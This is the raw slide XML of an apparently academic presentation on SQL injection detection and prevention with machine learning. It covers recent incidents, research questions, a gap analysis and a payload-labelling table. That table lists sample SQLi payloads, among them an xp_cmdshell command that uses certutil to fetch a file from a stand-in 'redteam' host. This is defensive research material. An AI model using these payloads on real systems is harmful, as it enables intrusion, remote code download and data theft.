                      <a:endParaRPr lang="en-GB" sz="15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117" marR="88117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500" u="sng" kern="100">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Affected Component</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="15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117" marR="88117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500" u="sng" kern="100">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Impact</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="15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117" marR="88117" marT="0" marB="0"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1397233918"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="868504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500" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>WooCommerce, 2021 [1]</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="15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117" marR="88117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500" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>WordPress Plugin</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="15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117" marR="88117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500" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Authentication Bypass</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="15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117" marR="88117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500" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Webhook Search Parameter</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="15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117" marR="88117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500" kern="100">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Data Theft</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="15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117" marR="88117" marT="0" marB="0"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3956217334"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="996445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500" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>BQE </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1500" kern="100" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>BillQuick</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1500" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>,</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="6350" indent="-6350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500" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>2021 [2]</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="15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117" marR="88117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500" kern="100">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Web Application</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="15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117" marR="88117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500" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Remote Code Execution</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="15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117" marR="88117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500" kern="100">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>“txtID” (username) parameter</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="15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117" marR="88117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500" kern="100">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Malware Deployment</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="15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117" marR="88117" marT="0" marB="0"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1180155092"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="437879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500" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Django, 2022 [3]</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="15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117" marR="88117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500" kern="100">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Web Application</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="15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117" marR="88117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500" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Blind SQL Injection</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="15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117" marR="88117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500" kern="100">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Trunc and Extract Functions</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="15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117" marR="88117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500" kern="100">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>CIA Compromise</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="15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117" marR="88117" marT="0" marB="0"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3822512873"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="437879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500" kern="100" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>MOVEit</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1500" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>, 2023 [4]</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="15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117" marR="88117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500" kern="100">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Web Application</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="15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117" marR="88117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500" kern="100">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Classic SQL Injection</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="15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117" marR="88117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500" kern="100">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>UserEngine Function</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="15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117" marR="88117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500" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Data Exfiltration</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="15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117" marR="88117" marT="0" marB="0"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="29735172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F9823A1-A603-0826-2012-CA4F146C2D8C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4696933" y="5532910"/>
            <a:ext cx="279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Table 2 (from Dissertation)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="83372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FFF2-C3E6-3802-F5DE-6AA0187CF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18" y="3237361"/>
            <a:ext cx="11029616" cy="579992"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB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26AE9-CF0D-A3DF-89E0-67F1DF88C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766" y="3237362"/>
            <a:ext cx="11029615" cy="3431796"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t>RQ1:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> How can multisource SQLi detection methods mitigate SQLi attacks?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t>RQ2:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> What are the advantages of using multiclassification-based machine learning models to detect and categorise detected SQLi payloads?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t>RQ3:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> How has the proposed risk analysis enhanced state-of-the-art vulnerability prioritization systems?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t>RQ4:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> How can continuous monitoring techniques prevent SQLi attacks?</a:t>
            </a:r>
          </a:p>
          <a:p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EEA5F5-5866-AF10-82CE-85D1ECC37474}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="650766" y="516627"/>
            <a:ext cx="11029616" cy="9146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Research Objectives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094736-032E-554A-174A-887CBF9ECFE0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="511619" y="1007168"/>
            <a:ext cx="11029615" cy="2421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research objectives are as follows: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700" dirty="0"/>
              <a:t>Train machine and deep learning models on real-world SQLi datasets for detecting attacks from various sources.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700" dirty="0"/>
              <a:t>Evaluate current SQLi attack detection solutions and perform gap analysis.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700" dirty="0"/>
              <a:t>Develop a novel approach to SQLi detection and prevention framework, SQLR34P3R.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3944015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FFF2-C3E6-3802-F5DE-6AA0187CF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17" y="3822429"/>
            <a:ext cx="11029616" cy="579992"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Project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26AE9-CF0D-A3DF-89E0-67F1DF88C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766" y="4434320"/>
            <a:ext cx="11029615" cy="1604974"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Multisource Detection (Network Traffic, HTTP Headers, HTTP Body and URL Parameters)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Multiclassification</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Risk Prioritization incorporating Threat Intelligence</a:t>
            </a:r>
          </a:p>
          <a:p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EEA5F5-5866-AF10-82CE-85D1ECC37474}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="650766" y="516627"/>
            <a:ext cx="11029616" cy="9146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Gap Analysis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094736-032E-554A-174A-887CBF9ECFE0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="511619" y="1007168"/>
            <a:ext cx="11029615" cy="330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Out of the 16 state-of-the-art SQLi attack detection and prevention solutions evaluated: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700" dirty="0"/>
              <a:t>None of the evaluated state-of-the-art solutions could attribute detected SQLi attacks to their respective classes. They just labelled intercepted traffic as either malicious or benign.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700" dirty="0"/>
              <a:t>None of the evaluated solutions performed attack prioritization or risk modelling.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700" dirty="0"/>
              <a:t>Only 12% of the evaluated solutions adopted a multisource approach to SQLi attack detection.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700" dirty="0"/>
              <a:t>Only 38% of the evaluated solutions implemented active response or prevention capabilities.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 2" descr="Contribution Stock Illustrations – 23,730 Contribution Stock Illustrations,  Vectors &amp; Clipart - Dreamstime">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E0D02A02-2877-4BDE-B7F5-B6A752928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659" y="4312970"/>
            <a:ext cx="2160182" cy="216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37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5B6B-0B44-CCC4-8400-29EED8C9C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146474"/>
            <a:ext cx="11029616" cy="565051"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Multisource and Multiclassification Detection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="279561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5B6B-0B44-CCC4-8400-29EED8C9C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7"/>
            <a:ext cx="11029616" cy="466244"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Classification Framework </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4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FBF31836-5B89-3B0A-B675-A0BB65FF9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215" y="1245743"/>
            <a:ext cx="7039569" cy="4910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904584-A758-8B46-8A4C-A897692725CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4361564" y="6233185"/>
            <a:ext cx="346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Figure 2 (from Dissertation)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="547243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EEA5F5-5866-AF10-82CE-85D1ECC37474}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="650766" y="516628"/>
            <a:ext cx="11029616" cy="49937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Attack Labelling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E625276-F091-3F67-0B5C-28CCDE67A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901395"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1854201" y="1125858"/>
          <a:ext cx="8928103" cy="4716141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436183">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3023025665"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="4754743">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="293923468"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1872217">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1035221937"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="864960">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1937938906"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="438884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800" kern="100" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Literature</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="1800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0" marR="4025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800" kern="100" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Characteristic</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="1800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0" marR="4025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800" kern="100" dirty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en-GB" sz="1800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0" marR="4025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800" kern="100" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Label</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="1800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0" marR="40250" marT="0" marB="0"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2622551267"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="681754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400" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>[5]</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="1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0" marR="4025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400" kern="100" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>alan</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1400" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>’ or '2'='2'-- - </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="1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0" marR="4025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400" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Authentication Bypass</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="1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0" marR="40250" marT="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400" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>0</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="1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0" marR="40250" marT="0" marB="0"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="254590832"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="438884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400" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>[5]</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="1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0" marR="4025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400" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>; WAITFOR TIME '18:15:00'; -- - </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="1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0" marR="4025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400" kern="100">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Blind SQL Injection</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="1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0" marR="40250" marT="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400" kern="100">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>1</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="1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0" marR="40250" marT="0" marB="0"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1343256980"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1045349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400" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>[6]</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="1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0" marR="4025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400" kern="100">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>select derived_table.table1 from (select encode(decode(compress(convert(post) using latin1)),md5(concat(post,post))) as derived_table;</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="1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0" marR="4025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400" kern="100">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Denial of Service</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="1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0" marR="40250" marT="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400" kern="100">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>2</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="1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0" marR="40250" marT="0" marB="0"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="123464332"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="681754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400" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>[5]</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="1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0" marR="4025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400" kern="100">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>' UNION SELECT 'a',NULL,NULL,NULL-- - </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="1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0" marR="4025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400" kern="100">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Classic SQL Injection</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="1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0" marR="40250" marT="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400" kern="100">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>3</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="1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0" marR="40250" marT="0" marB="0"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1188822086"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="681754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400" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>[7]</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="1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0" marR="4025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400" kern="100">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>; exec master..xp_cmdshell ‘certutil -urlcache -f https://redteam/'--</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="1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0" marR="4025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400" kern="100">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Remote Code Execution</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="1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0" marR="40250" marT="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400" kern="100">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>4</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="1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0" marR="40250" marT="0" marB="0"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="235339340"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="747762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400" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>[8]</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="1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0" marR="4025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400" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>SELECT DEPARTMENT, COUNT(*)</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="6350" indent="-6350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400" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>    FROM EMPLOYEES;</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="1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0" marR="4025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400" kern="100">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Normal SQL Operation</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="1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0" marR="40250" marT="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53000"/>
                        </a:lnSpc>
                        <a:spcAft>
                          <a:spcPts val="565"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1400" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>5</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="1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0" marR="40250" marT="0" marB="0"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="23313958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15C6222-705F-C291-FCD3-295BDC711137}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4583815" y="5841999"/>
            <a:ext cx="346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Table 5 (from Dissertation)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="254649540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48_TF33552983" id="{961483DA-4BD3-44EC-967F-28A9E73D864F}" vid="{5CA6A686-A782-4144-9C39-0617ED3EC6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3237</TotalTime>
  <Words>1983</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>181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Franklin Gothic Book</vt:lpstr>
      <vt:lpstr>Franklin Gothic Demi</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Wingdings 2</vt:lpstr>
      <vt:lpstr>DividendVTI</vt:lpstr>
      <vt:lpstr>OO02: SQL Injection attack detection and prevention</vt:lpstr>
      <vt:lpstr>Background</vt:lpstr>
      <vt:lpstr>SQL Injection Overview</vt:lpstr>
      <vt:lpstr>SQLi Recent Attacks, Attack Vectors &amp; Impacts</vt:lpstr>
      <vt:lpstr>Research Questions</vt:lpstr>
      <vt:lpstr>Project Contributions</vt:lpstr>
      <vt:lpstr>Multisource and Multiclassification Detection</vt:lpstr>
      <vt:lpstr>Classification Framework </vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Classifier Selection and Reasoning</vt:lpstr>
      <vt:lpstr>Experimental Results and Analysis – HTTP/Application Layer Detection</vt:lpstr>
      <vt:lpstr>Experimental Results and Analysis – Network traffic Detection</vt:lpstr>
      <vt:lpstr>Risk Analysis and Threat modelling</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Individual vs Combined</vt:lpstr>
      <vt:lpstr>System Background</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>SQLR34P3R Process Flow</vt:lpstr>
      <vt:lpstr>SQLR34P3R Component Diagram</vt:lpstr>
      <vt:lpstr>SQLr34p3R State Diagram</vt:lpstr>
      <vt:lpstr>What technical challenges did you encounter and how were these overcome?</vt:lpstr>
      <vt:lpstr>Advantages of SQLR34P3R over State-of-the-art</vt:lpstr>
      <vt:lpstr>Future Improvements</vt:lpstr>
      <vt:lpstr>System Demonstration</vt:lpstr>
      <vt:lpstr>Payloads For Testing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ELE8095: SQL Injection attack detection and prevention</dc:title>
  <dc:creator>ALAN PAUL</dc:creator>
  <cp:lastModifiedBy>ALAN PAUL</cp:lastModifiedBy>
  <cp:revision>13</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-09-16T11:32:56Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-09-20T05:40:23Z</dcterms:modified>
</cp:coreProperties>
</file>